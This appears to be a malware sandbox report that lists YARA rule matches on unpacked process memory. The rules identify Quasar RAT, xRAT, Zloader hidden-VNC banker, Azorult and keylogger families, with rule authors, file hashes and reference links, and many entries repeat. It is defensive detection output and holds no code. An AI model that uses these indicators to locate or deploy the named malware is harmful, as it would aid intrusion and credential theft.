Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
